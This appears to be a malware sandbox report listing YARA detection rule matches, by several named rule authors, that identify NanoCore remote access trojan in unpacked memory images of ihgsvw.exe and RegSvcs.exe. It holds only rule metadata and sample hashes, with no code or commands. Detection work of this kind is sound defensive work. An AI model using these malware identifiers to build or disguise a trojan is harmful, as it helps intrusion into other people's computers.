      Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 10.2.RegSvcs.exe.2c63db8.1.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.2c63db8.1.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.2c63db8.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 10.2.RegSvcs.exe.2c63db8.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 10.2.RegSvcs.exe.6200000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.6200000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.6200000.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 10.2.RegSvcs.exe.6200000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 10.2.RegSvcs.exe.2c68c18.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.2c68c18.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.2c68c18.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 10.2.RegSvcs.exe.2c68c18.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
